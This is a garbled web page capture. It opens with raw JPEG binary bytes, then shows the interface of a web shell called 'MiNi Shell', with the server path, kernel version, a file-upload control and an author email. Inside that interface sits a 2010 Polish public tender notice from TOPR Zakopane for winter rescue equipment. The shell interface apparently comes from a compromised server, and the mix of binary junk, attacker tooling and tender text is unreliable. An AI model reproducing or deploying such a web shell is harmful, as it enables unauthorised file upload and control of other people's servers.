JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100810/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100810/243938-N-2010.html

<p class="kh_header"><b>Zakopane: Sprzęt do ratownictwa zimowego - 40 kompletów</b><br>
<b>Numer ogłoszenia: 243938 - 2010; data zamieszczenia: 10.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Tatrzańskie Ochotnicze Pogotowie Ratunkowe , ul. Piłsudskiego 63a, 34-500 Zakopane, woj. małopolskie, tel. 018 2063581, 603100010, faks 018 2014731.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.topr.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.topr.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Stowarzyszenie.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprzęt do ratownictwa zimowego - 40 kompletów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W skład kompletu wchodzą:

I.	Zestaw do ski alpinizmu:
a.	Narty taliowane z przeznaczeniem do uprawiania narciarstwa ski- alpinistycznego i jazdy poza trasami. Szerokość narty pod butem od 82 do 90 mm. Waga 1 narty przy długości 170 cm i szerokości pod butem 90 mm. max 1400 gr. (przy podanej długości narty i szerokości pod butem waga obliczona zostanie proporcjonalnie)  
b.	Wiązania do uprawiania narciarstwa ski-alpinistycznego, zapewniające możliwość podchodzenia i zjazdu umożliwiające wpięcie butów ski alpinistycznych. Komplet winien zawierać: skistopery, oraz noże do poruszania się po twardym śniegu (harszle). Waga maksymalna kompletu do 1 narty, bez noży max 600 gr. 
c.	Buty z przeznaczeniem do uprawiania narciarstwa ski-alpinistycznego, zapewniające wygodę podczas podchodzenia i optymalne trzymanie nogi podczas jazdy w każdym terenie i warunkach. But winien posiadać możliwość przypięcia raków automatycznych. But winien być wyposażony w system minimum dwóch klamer oraz podeszwę typu wibram, lub podobną. But winien zapewniać możliwość szybkiego przepięcia sprzętu jedną klamrą w przypadku zmiany kierunku z podchodzenia na zjazd i odwrotnie. Waga jednego buta max. 1300 gr przy rozmiarze 27 cm. But wewnętrzny winien zapewniać komfort cieplny, dobre dopasowanie, termoformowalny, wykonany z materiałów szybkoschnących. 
d.	Kijki składane dwuelementowe, z wygodnym i niezawodnym systemem regulacji długości, zatrzaskowe typu clipper lub podobne z przedłużoną wyściółka pod rękojeścią,, wykonane z materiałów o podwyższonej wytrzymałości. W komplecie winny znajdować się 2 rodzaje kółek o różnej średnicy.
e.	Foki z zaczepami do tyłu i przodu nart, wykonane z materiału zawierającego min 70% mohairu. Możliwość docięcia i założenia do skiturowych nart taliowanych o szerokości pod butem 82 - 90 mm. 
f.	Kask ochronny lekki waga max 350 gram, wentylowany, prosta i skuteczna regulacja obwodu głowy z boczną regulacją paska pod brodą umożliwiającą regulację do przodu i tyłu, przystosowany do mocowania latarki czołówki, z przeznaczeniem do alpinizmu.
II.	Przyrządy do nawigacji:
a.	Urządzenie GPS z bardzo czułym odbiornikem sygnałów satelitarnych, umożliwiające nawigację nawet w mocno zalesionych miejscach i głębokich kanionach, wbudowany wysokościomierz barometryczny, wbudowany elektroniczny kompas, obudowa o wodoodporności klasy IPX7, kolorowy ekran TFT 256 kolorów rozdz. min. 160x240 pikseli, wbudowana mapa bazowa z funkcją automatycznego wyznaczania tras, obejmująca drogi główne, zjazdy, dostarczanie automatycznych, szczegółowych wskazówek nawigacyjnych. Interfejs szeregowy i USB, obsługa kart pamięci microSD lub podobnych.  Obsługa map. Pamięć: min. 1000 punktów (pozycji), trasy min. 50, wykresy śladu min. 10000 punktów, min. 20 zapisanych tras. Możliwość dodawania własnych punktów POI. Zasilanie bateriami AA, czas działania min. 16 godz., waga z bateriami do 220 gram.
b.	Kompas płytkowy z klinometrem - właściwości: system dwustrefowy (wersja z orientacją dla półkuli północnej) lub globalny, zmienna skala korekcji deklinacji, pływająca igła magnetyczna, lusterko, skala centymetrowa, sznurek mocujący.
III.	Przyrządy do poszukiwań w lawinie:
a.	Detektor lawinowy umożliwiający pracę w dwóch trybach - nadawania i odbioru sygnału w celu lokalizacji zasypanego, min. trzy antenowy pracujący w zakresie 457 kHz, zasięg trybu szukania wstępnego min 60 m z funkcją trwałego markowania (nie chwilowego) - odznaczania, czyli rozróżnienia osób znalezionych przy wieloosobowym zasypaniu, tryb zabezpieczający LVS przed przypadkowym przełączeniem w tryb nadawania - czujnik ruchu, oraz monitoring funkcji życiowych (nadawanie i odbiór). 
b.	Sonda lawinowa, metalowa, składana przeznaczona w szczególności do działań zorganizowanych grup ratowniczych o długości min 320 cm  po rozłożeniu, wyposażona w prosty, szybki, niezawodny i trwały system rozkładania i blokowania linką stalową. Waga max 700 gram. 
c.	Łopatka lawinowa rozkładana, demontowany trzon dwu elementowy, owalny, wykonana z wytrzymałych materiałów, długość łopatki wraz ze styliskiem po rozłożeniu min. 80cm, wielkość szufli min 23 x 30 x 6 cm - kształt ułatwiający dociśnięcie szufli butem. Uchwyt na stylisku D-kształtny, konstrukcja umożliwiająca zamontowanie styliska pod kątem 90 stopni. Waga max. 800 g.
d.	Piła do śniegu i lodu składana, stabilna po złożeniu, długość ostrza minimum 35cm, wygodny uchwyt, w komplecie z piłą pokrowiec ochronny..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 35.80.00.00-2, 29.85.10.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 12.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> wadium 3.000 złotych</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Aby oferta została uznana za ważną musi spełniać następujące warunki:
- wykonawca nie jest wykluczony z ubiegania się o zamówienie publiczne na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych,
- oferta jest złożona na piśmie w języku polskim,
- oferta została złożona przed upływem terminu składania ofert,
- oferta jest podpisana przez upoważnionego przedstawiciela Wykonawcy.
Aby oferta nie została odrzucona musi spełniać następujące warunki:
- nie może naruszać zasad ustawy Prawo zamówień publicznych (w szczególności zasady uczciwej konkurencji),
- treść oferty musi być zgodna z ustawą Prawo zamówień publicznych, a jej treść musi odpowiadać SIWZ,
- złożenie jej nie może stanowić czynu nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji,
- nie może zawierać rażąco niskiej ceny w stosunku do przedmiotu zamówienia,
- nie może posiadać omyłek rachunkowych w obliczeniu ceny lub w razie ich wystąpienia, Wykonawca w terminie 7 dni od dnia otrzymania zawiadomienia wyrazi zgodę na ich poprawienie przez Zamawiającego,
- nie może zawierać omyłki rachunkowej w obliczeniu ceny, której nie można poprawić na podstawie art. 88 ustawy prawo zamówień publicznych lub błędu w obliczeniu ceny,
- musi być ważna na podstawie odrębnych przepisów,
- nie może zostać złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia lub niezaproszonego do składania ofert - nie jest nieważna na podstawie odrębnych przepisów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis parametrów technicznych oferowanego sprzętu ze szczególnym uwzględnieniem danych objętych kryteriami oceny oferty. Wskazane jest przedstawienie do oceny komisji przetargowej wzorów oferowanego sprzętu. Wykaz dostaw z ostatnich 3 lat sporządzony według wzoru stanowiącego załącznik numer 2 do niniejszej SIWZ,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zaświadczenie z ZUS-u o niezaleganiu ze składkami na ubezpieczenie społeczne. Data wystawienia zaświadczenia - nie więcej niż 3 miesiące przed terminem wyznaczonym do składania ofert lub oświadczenie oferenta o nie zaleganiu ze składkami ZUS.
Zaświadczenie z Urzędu Skarbowego o niezaleganiu z podatkami. Data wystawienia zaświadczenia - nie więcej niż 3 miesiące przed terminem wyznaczonym do składania ofert lub oświadczenie oferenta o nie zaleganiu z podatkami.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Waga sprzętu - 30</li>
<li>3 - Warunki serwisu - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.topr.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 34-500 Zakopane, Piłsudskiego 63 a.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.09.2010 godzina 13:00, miejsce: zakopane, Piłsudskiego 63 a.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt finansowany ze środków Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com